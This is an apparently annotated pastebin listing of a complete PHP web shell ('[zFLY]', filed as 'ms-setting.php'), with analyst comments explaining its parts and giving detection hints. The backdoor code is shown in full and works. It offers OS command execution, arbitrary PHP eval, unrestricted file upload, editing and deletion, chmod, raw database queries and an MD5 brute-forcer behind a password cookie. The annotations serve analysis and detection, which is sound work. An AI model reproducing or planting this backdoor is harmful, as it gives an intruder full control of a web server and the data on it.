troykd

ms-setting.php problem

Jul 23rd, 2012
  1. <?php
  2.  
  // Analyst note: this listing is a PHP web shell, i.e. a remote-administration backdoor script.
  // All PHP error reporting is turned off for the request, so faults in the script produce no notices or warnings.
  3. error_reporting(0);
  4.  
  // Stored credential. Because it is 32 characters long, the login code below treats it as an MD5 digest of the password.
  5. $password = "d48da8a4f42521d202a2a389e2b73ee4"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
  6.  
  // File name of this script, used for self-referencing links and form actions.
  7. $me = basename(__FILE__);
  // Hard-coded cookie name that marks a logged-in session; as a fixed string it is usable as a search term in captured traffic.
  8. $cookiename = "ENF7ZT35Z5ni";
  9.  
  10.  
  // Login attempt: a POSTed `pass` field is compared with the stored credential.
  11. if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
  12. {
  13.  
  14. if(strlen($password) == 32) //If the length of the password is 32 characters, treat it as an md5.
  15. {
  // The unsalted MD5 of the submitted value overwrites the POST field before the comparison.
  16. $_POST['pass'] = md5($_POST['pass']);
  17. }
  18.  
  // Loose (==) string comparison; not a constant-time check.
  19. if($_POST['pass'] == $password)
  20. {
  // The cookie value is the same string as $password (no random session token), valid for one hour and set
  // without path, Secure or HttpOnly arguments. The stored digest therefore doubles as the session credential:
  // a host carrying this file should be treated as exposed to anyone who has read the file's contents.
  21. setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let them in
  22. }
  // reload() runs whether or not the password matched. It only sends a Location header and does not exit,
  // so execution continues into the access gate below.
  23. reload();
  24. }
  25.  
  26.  
  27.  
  // Access gate. `&&` binds tighter than `or`, so the condition reads:
  //   (password configured AND cookie absent) OR (cookie value != stored credential).
  // With an empty $password and no cookie both sides are false, i.e. an empty password disables the gate.
  // The comparison is loose (!=) and the cookie index is read even when the cookie is absent
  // (the resulting notice is hidden by error_reporting(0)).
  28. if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
  29. {
  // Show the password form and stop; nothing below runs for an unauthenticated request.
  30. login();
  31. die();
  32. }
  33. //
  34. //Do not cross this line! All code placed after this block can't be executed without being logged in!
  35. //
  36.  
  // Logout: expires the session cookie, then sends the redirect header (the script keeps running afterwards).
  37. if(isset($_GET['p']) && $_GET['p'] == "logout")
  38. {
  39. setcookie ($cookiename, "", time() - 3600);
  40. reload();
  41. }
  // The working directory is taken directly from the `dir` query parameter. Every relative path used later
  // (opendir('.'), realpath('.'), file operations) resolves against it, so the operator can browse any
  // directory the PHP process can enter. The chdir() return value is not checked.
  // Triage: requests to this script carrying `dir=` with absolute filesystem paths.
  42. if(isset($_GET['dir']))
  43. {
  44. chdir($_GET['dir']);
  45. }
  46.  
  47.  
  // Menu entries: action key (value of the `p` parameter) => link label shown in the header.
  // The dispatcher further down also handles 'edit', 'delete', 'rename' and 'createdir', which are reached
  // from the file listing and forms rather than from this menu.
  48. $pages = array(
  49. 'cmd' => 'Execute Command',
  50. 'eval' => 'Evaluate PHP',
  51. 'mysql' => 'MySQL Query',
  52. 'chmod' => 'Chmod File',
  53. 'phpinfo' => 'PHPinfo',
  54. 'md5' => 'md5 cracker',
  55. 'headers' => 'Show headers',
  56. 'logout' => 'Log out'
  57. );
  58.  
  // Page header template. The HTTP_HOST value from the environment is placed in <title> without escaping.
  // The fixed green-on-black stylesheet and the literal banner text "[zFLY]" appear in every authenticated
  // response, which makes them usable as content signatures when scanning response bodies or files on disk.
  59. //The header, like it?
  60. $header = '<html>
  61. <title>'.getenv("HTTP_HOST").'</title>
  62. <head>
  63. <style>
  64. td {
  65. font-size: 12px;
  66. font-family: verdana;
  67. color: #33FF00;
  68. background: #000000;
  69. }
  70.  
  71. #d {
  72. background: #003000;
  73. }
  74. #f {
  75. background: #003300;
  76. }
  77. #s {
  78. background: #006300;
  79. }
  80. #d:hover
  81. {
  82. background: #003300;
  83. }
  84. #f:hover
  85. {
  86. background: #003000;
  87. }
  88. pre {
  89. font-size: 10px;
  90. font-family: verdana;
  91. color: #33FF00;
  92. }
  93. a:hover {
  94. text-decoration: none;
  95. }
  96.  
  97.  
  98. input,textarea,select {
  99. border-top-width: 1px;
  100. font-weight: bold;
  101. border-left-width: 1px;
  102. font-size: 10px;
  103. border-left-color: #33FF00;
  104. background: #000000;
  105. border-bottom-width: 1px;
  106. border-bottom-color: #33FF00;
  107. color: #33FF00;
  108. border-top-color: #33FF00;
  109. font-family: verdana;
  110. border-right-width: 1px;
  111. border-right-color: #33FF00;
  112. }
  113.  
  114. hr {
  115. color: #33FF00;
  116. background-color: #33FF00;
  117. height: 5px;
  118. }
  119.  
  120. </style>
  121.  
  122. </head>
  123. <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
  124. <table width=100%><td id="header" width=100%>
  125. <p align=right><b>[zFLY] [<a href="'.$me.'">Home</a>] ';
  126.  
  // One menu link per $pages entry. Each link embeds realpath('.'), the absolute server-side path of the
  // current directory, unescaped in the href.
  127. foreach($pages as $page => $page_name)
  128. {
  129. $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
  130.  
  131. }
  // show_dirs() appends a clickable breadcrumb of the current path; the header is then sent to the client.
  132. $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
  133. print $header;
  134.  
  // Footer markup with the credit strings "ZflY" and "z3t"; it is printed after the function definitions.
  135. $footer = '<tr><td><hr><center>&copy; <a href="http://">ZflY</a> & <a href="http://">z3t</a></center></td></table></body></head></html>';
  136.  
  137.  
  138. //
  139. //Page handling
  140. //
  // Action dispatch. The action name `p` is read from $_REQUEST, so it may arrive by GET or POST (and by
  // cookie where php.ini includes cookies in $_REQUEST). Request parameters are used below without
  // validation, and most of them are echoed into HTML without escaping.
  141. if(isset($_REQUEST['p']))
  142. {
  143. switch ($_REQUEST['p']) {
  144.  
  145. case 'cmd': //Run command
  // The `command` request parameter goes unmodified to execute_command(), which hands it to an OS command
  // function; the command runs with the privileges of the PHP process.
  // Triage: requests with p=cmd, and child processes spawned by the web-server account.
  146.  
  147. print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
  148. if(isset($_REQUEST['command']))
  149. {
  150. print "<pre>";
  151. execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
  152. }
  153. break;
  154.  
  155.  
  156. case 'edit': //Edit a file
  // Writes the POSTed `editform` text to the path in the `file` query parameter; mode 'w' creates the file
  // or truncates an existing one. The `or print` handlers only emit a message: after a failed fopen() the
  // fwrite()/fclose() calls still run on the failed handle.
  // Triage: unexpected new or modified files owned by the web-server account.
  157. if(isset($_POST['editform']))
  158. {
  159. $f = $_GET['file'];
  160. $fh = fopen($f, 'w') or print "Error while opening file!";
  161. fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
  162. fclose($fh);
  163. }
  // The file name is written into the page text and the form action without HTML escaping.
  164. print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
  165.  
  // Existing file content is shown in the textarea, HTML-escaped line by line.
  166. if(file_exists($_GET['file']))
  167. {
  168. $rd = file($_GET['file']);
  169. foreach($rd as $l)
  170. {
  171. print htmlspecialchars($l);
  172. }
  173. }
  174.  
  175. print "</textarea><input type=submit value=\"Save\"></form>";
  176.  
  177. break;
  178.  
  179. case 'delete': //Delete a file
  // Deletes the path in the `file` query parameter once a POST field `yes` is present. The path is not
  // restricted to any directory. Without `yes`, a confirmation form is shown for an existing file.
  180.  
  181. if(isset($_POST['yes']))
  182. {
  183. if(unlink($_GET['file']))
  184. {
  185. print "File deleted successfully.";
  186. }
  187. else
  188. {
  189. print "Couldn't delete file.";
  190. }
  191. }
  192.  
  193.  
  194. if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
  195. {
  196. print "Are you sure you want to delete ".$_GET['file']."?<br>
  197. <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
  198. <input type=hidden name=yes value=yes>
  199. <input type=submit value=\"Delete\">
  200. ";
  201. }
  202.  
  203.  
  204. break;
  205.  
  206.  
  207. case 'eval': //Evaluate PHP code
  // The POSTed `eval` field is executed as PHP code inside this script (see the eval() call below).
  // The same text is first echoed back, HTML-escaped, into the textarea.
  208.  
  209. print "<form action=\"".$me."?p=eval\" method=POST>
  210. <textarea cols=60 rows=10 name=\"eval\">";
  211. if(isset($_POST['eval']))
  212. {
  213. print htmlspecialchars($_POST['eval']);
  214. }
  215. else
  216. {
  217. print "print \"Yo Momma\";";
  218. }
  219. print "</textarea><br>
  220. <input type=submit value=\"Eval\">
  221. </form>";
  222.  
  223. if(isset($_POST['eval']))
  224. {
  225. print "<h1>Output:</h1>";
  226. print "<br>";
  // Arbitrary PHP execution with the privileges of the PHP process; the code arrives in the POST body,
  // so it does not appear in a standard access log.
  227. eval($_POST['eval']);
  228. }
  229.  
  230. break;
  231.  
  232. case 'chmod': //Chmod file
  // Sets one of three fixed modes on the path in POST `chmod`. The inner switch compares the string
  // `chvalue` loosely against integer labels. chmod()'s return value is ignored, so the confirmation
  // message is printed even when no case matched or the call failed.
  233.  
  234.  
  235. print "<h1>Under construction!</h1>";
  236. if(isset($_POST['chmod']))
  237. {
  238. switch ($_POST['chvalue']){
  239. case 777:
  240. chmod($_POST['chmod'],0777);
  241. break;
  242. case 644:
  243. chmod($_POST['chmod'],0644);
  244. break;
  245. case 755:
  246. chmod($_POST['chmod'],0755);
  247. break;
  248. }
  249. print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
  250. }
  // PHP has already URL-decoded $_GET values, so urldecode() here decodes a second time; the result is
  // echoed unescaped into the form below.
  251. if(isset($_GET['file']))
  252. {
  253. $content = urldecode($_GET['file']);
  254. }
  255. else
  256. {
  257. $content = "file/path/please";
  258. }
  259.  
  260. print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
  261. <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
  262. <select name=\"chvalue\">
  263. <option value=\"777\">777</option>
  264. <option value=\"644\">644</option>
  265. <option value=\"755\">755</option>
  266. </select><input type=submit value=\"Change\">";
  267.  
  268. break;
  269.  
  270. case 'mysql': //MySQL Query
  // Connects to a database server with operator-supplied host and credentials and sends the POSTed
  // `query` verbatim; the result set is never printed. mysql_connect()/mysql_query() belong to the legacy
  // mysql extension, which was removed in PHP 7.
  271.  
  272. if(isset($_POST['host']))
  273. {
  274. $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
  275. mysql_select_db($_POST['dbase']);
  276. $sql = $_POST['query'];
  277.  
  278.  
  279. $result = mysql_query($sql);
  280.  
  281. }
  282. else
  283. {
  284. print "
  285. This only queries the database, doesn't return data!<br>
  286. <form action=\"".$me."?p=mysql\" method=POST>
  287. <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
  288. <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
  289. <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
  290. <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
  291.  
  292. <b>Query:<br></b<textarea name=query></textarea>
  293. <input type=submit value=\"Query database\">
  294. </form>
  295. ";
  296.  
  297. }
  298.  
  299. break;
  300.  
  301. case 'createdir':
  // Creates the directory named in the `crdir` query parameter; the parameter is used without an isset() check.
  302. if(mkdir($_GET['crdir']))
  303. {
  304. print 'Directory created successfully.';
  305. }
  306. else
  307. {
  308. print 'Couldn\'t create directory';
  309. }
  310. break;
  311.  
  312.  
  313. case 'phpinfo': //PHP Info
  // Sends the complete phpinfo() report (PHP configuration, loaded extensions, environment) to the client.
  314. phpinfo();
  315. break;
  316.  
  317.  
  318. case 'rename':
  // rename() with source and destination both taken from POST; with a destination in another directory
  // this also moves the file. Only the name pre-filled in the form is passed through basename().
  319.  
  320. if(isset($_POST['fileold']))
  321. {
  322. if(rename($_POST['fileold'],$_POST['filenew']))
  323. {
  324. print "File renamed.";
  325. }
  326. else
  327. {
  328. print "Couldn't rename file.";
  329. }
  330.  
  331. }
  332. if(isset($_GET['file']))
  333. {
  334. $file = basename(htmlspecialchars($_GET['file']));
  335. }
  336. else
  337. {
  338. $file = "";
  339. }
  340.  
  341. print "Renaming ".$file." in folder ".realpath('.').".<br>
  342. <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
  343. <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
  344. <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
  345. <input type=submit value=\"Rename file\">
  346. </form>";
  347. break;
  348.  
  349. case 'md5':
  // Digest guessing over a very small candidate space. `timelimit` from the form is passed to
  // set_time_limit() when numeric, otherwise 30 is used.
  // Numeric branch: counts up from 0 and stops at 100000 (the form label advertises a larger range).
  // Alphabetic branch: as listed, md5() is applied to the boolean result of the comparison (note the
  // parenthesis placement), which always yields a non-empty string, so the loop stops at its first candidate.
  350. if(isset($_POST['md5']))
  351. {
  352. if(!is_numeric($_POST['timelimit']))
  353. {
  354. $_POST['timelimit'] = 30;
  355. }
  356. set_time_limit($_POST['timelimit']);
  357. if(strlen($_POST['md5']) == 32)
  358. {
  359.  
  360. if($_POST['chars'] == "9999")
  361. {
  362. $i = 0;
  363. while($_POST['md5'] != md5($i) && $i != 100000)
  364. {
  365. $i++;
  366. }
  367. }
  368. else
  369. {
  370. for($i = "a"; $i != "zzzzz"; $i++)
  371. {
  372. if(md5($i == $_POST['md5']))
  373. {
  374. break;
  375. }
  376. }
  377. }
  378.  
  379.  
  // The submitted digest is echoed into the page without escaping when a match is reported.
  380. if(md5($i) == $_POST['md5'])
  381. {
  382. print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
  383. }
  384.  
  385. }
  386.  
  387. }
  388.  
  389. print "Will bruteforce the md5
  390. <form action=\"".$me."?p=md5\" method=POST>
  391. <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
  392. <b>Characters:</b><br><select name=\"chars\">
  393. <option value=\"az\">a - zzzzz</option>
  394. <option value=\"9999\">1 - 9999999</option>
  395. </select>
  396. <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
  397. <input type=submit value=\"Bruteforce md5\">
  398. </form><br>*: if set_time_limit is allowed by php.ini";
  399. break;
  400.  
  401. case 'headers':
  // Prints the request headers returned by getallheaders(), HTML-escaped.
  402. foreach(getallheaders() as $header => $value)
  403. {
  404. print htmlspecialchars($header . ":" . $value)."<br>";
  405.  
  406. }
  407. break;
  408. }
  409.  
  410. }
  411. else //Default page that will be shown when the page isn't found or no page is selected.
  412. {
  // Default view: optional file upload, then a listing of the current directory with links to the
  // rename, delete, edit and chmod actions. This branch runs only when `p` is absent from the request.
  413.  
  414. $files = array();
  415. $directories = array();
  416.  
  // Upload: the file is stored in the current directory under the client-supplied base name. There is no
  // check on file type or extension, so the operator can place further scripts on the host.
  // Triage: multipart POST requests to this script and new files appearing next to web content.
  417. if(isset($_FILES['uploadedfile']['name']))
  418. {
  419. $target_path = realpath('.').'/';
  420. $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
  421.  
  422. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  423. print "File:". basename( $_FILES['uploadedfile']['name']).
  424. " has been uploaded";
  425. } else{
  426. echo "File upload failed!";
  427. }
  428. }
  429.  
  430.  
  431.  
  432.  
  433.  
  // Listing: entries of the current directory are split into directories and files and sorted. Names,
  // absolute paths (realpath), sizes, permissions and modification times go into the table unescaped.
  434. print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
  435. if ($handle = opendir('.'))
  436. {
  437. while (false !== ($file = readdir($handle)))
  438. {
  439. if(is_dir($file))
  440. {
  441. $directories[] = $file;
  442. }
  443. else
  444. {
  445. $files[] = $file;
  446. }
  447. }
  448. asort($directories);
  449. asort($files);
  // Directory rows: [R]ename and [D]elete links, a link that changes into the directory, and its permissions.
  450. foreach($directories as $file)
  451. {
  452. print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  453. }
  454.  
  // File rows: same links, with the name linking to the edit action and the size shown.
  455. foreach($files as $file)
  456. {
  457. print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  458. }
  459. }
  460. else
  461. {
  462. print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
  463. }
  464.  
  // Forms for upload, change directory, create file (routes to the edit action) and create directory.
  // The MAX_FILE_SIZE hidden field is only a client-side hint.
  465. print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
  466. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
  467. <input type=\"submit\" value=\"Upload File\" />
  468. </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
  469. <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
  470. </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
  471. </table>";
  472.  
  473.  
  474. }
  475.  
  476.  
  // Prints the password form. It POSTs a single field `pass` back to this script's own file name.
  // The form and the closing markup are left unterminated; the caller stops the script right after.
  477. function login()
  478. {
  479. print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
  480. <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
  481. <input type=\"password\" maxlength=\"35\" name=\"pass\"><input type=\"submit\" value=\"Login\">
  482. </form>";
  483. }
  // Sends a Location header pointing at this script's own file name.
  // It does not call exit, so the caller keeps executing after the header is queued.
  484. function reload()
  485. {
  486. header("Location: ".basename(__FILE__));
  487. }
  488.  
  // Picks the name of an available OS command function. The checks are independent `if`s, so each later
  // match overwrites the earlier one: `system` wins whenever it exists. Returns "Disabled" when none of
  // the four functions exists.
  // The probing presumably copes with hosts that restrict these functions (e.g. via disable_functions in
  // php.ini); restricting all four leaves the command page without an execution path.
  // As listed, the shell_exec literal contains a space ("shell_ exec"), possibly an artefact of the paste;
  // in that form it matches no branch of execute_command().
  489. function get_execution_method()
  490. {
  491. if(function_exists('passthru')){ $m = "passthru"; }
  492. if(function_exists('exec')){ $m = "exec"; }
  493. if(function_exists('shell_exec')){ $m = "shell_ exec"; }
  494. if(function_exists('system')){ $m = "system"; }
  495. if(!isset($m)) //No method found :-|
  496. {
  497. $m = "Disabled";
  498. }
  499. return($m);
  500. }
  501.  
  // Runs $command through the OS command function named by $method and writes its output to the response.
  // $command is passed through unchanged; the output is not HTML-escaped. A $method that matches none of
  // the four names (including "Disabled") results in no action and no message.
  502. function execute_command($method,$command)
  503. {
  504. if($method == "passthru")
  505. {
  506. passthru($command);
  507. }
  508.  
  509. elseif($method == "exec")
  510. {
  // exec() collects output lines into $result; each line is printed followed by <br>.
  511. exec($command,$result);
  512. foreach($result as $output)
  513. {
  514. print $output."<br>";
  515. }
  516. }
  517.  
  518. elseif($method == "shell_exec")
  519. {
  520. print shell_exec($command);
  521. }
  522.  
  523. elseif($method == "system")
  524. {
  525. system($command);
  526. }
  527.  
  528. }
  529.  
  // Returns the last four octal digits of fileperms($file) as a string, or "????" when the path does not exist.
  530. function perm($file)
  531. {
  532. if(file_exists($file))
  533. {
  534. return substr(sprintf('%o', fileperms($file)), -4);
  535. }
  536. else
  537. {
  538. return "????";
  539. }
  540. }
  541.  
  // Colour used for the permission column of the listing, from the PHP process's point of view:
  // "green" = writable, "white" = readable but not writable, "red" = neither.
  // For the operator this highlights which entries the web-server account can modify.
  542. function get_color($file)
  543. {
  544. if(is_writable($file)) { return "green";}
  545. if(!is_writable($file) && is_readable($file)) { return "white";}
  546. if(!is_writable($file) && !is_readable($file)) { return "red";}
  547.  
  548.  
  549.  
  550. }
  551.  
  // Builds an HTML breadcrumb for realpath($where): one link per path component, each pointing at this
  // script with `dir=` set to the path up to that component. Path parts are written unescaped.
  // The path is split on backslashes when it starts with a lowercase "c:", otherwise on forward slashes.
  // ereg() was removed in PHP 7; since this function is called while the page header is built, the script
  // as listed only runs on PHP 5.x, which helps date the sample.
  552. function show_dirs($where)
  553. {
  554. if(ereg("^c:",realpath($where)))
  555. {
  556. $dirparts = explode('\\',realpath($where));
  557. }
  558. else
  559. {
  560. $dirparts = explode('/',realpath($where));
  561. }
  562.  
  563.  
  564.  
  565. $i = 0;
  566. $total = "";
  567.  
  568. foreach($dirparts as $part)
  569. {
  // Rebuild the prefix made of components 0 .. $i-1, joined with "/" (also on the backslash-split path).
  570. $p = 0;
  571. $pre = "";
  572. while($p != $i)
  573. {
  574. $pre .= $dirparts[$p]."/";
  575. $p++;
  576.  
  577. }
  578. $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  579. $i++;
  580. }
  581.  
  582. return "<h2>".$total."</h2><br>";
  583.  
  584. }
  // Emit the footer built earlier, then terminate the request.
  585. print $footer;
  586.  
  // The unconditional exit() also stops a host script that include()s this file from running any further,
  // so a legitimate page that has had this file included into it ends here.
  587. // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
  588. exit();
  589. ?>